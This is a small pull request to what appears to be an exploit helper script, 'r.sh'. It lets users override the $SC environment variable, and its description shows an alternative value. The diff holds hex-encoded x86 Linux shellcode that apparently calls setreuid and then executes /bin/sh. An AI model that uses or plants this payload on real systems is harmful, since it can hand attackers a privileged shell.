### PR TITLE
Allow over-riding $SC on the command line

### DIFF
--- a/r.sh
+++ b/r.sh
@@ -9,7 +9,9 @@
 # as published by the Free Software Foundation; either version 2
 # of the License, or (at your option) any later version.
 
+if [ "$SC" == "" ]; then
 export SC=$'\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80'
+fi
 export PWD=`pwd`
 
 IFS=" "


### PR DESCRIPTION
This allows the usage 

``` sh
SC=$'\xeb\xfe' bash r.sh ...
```
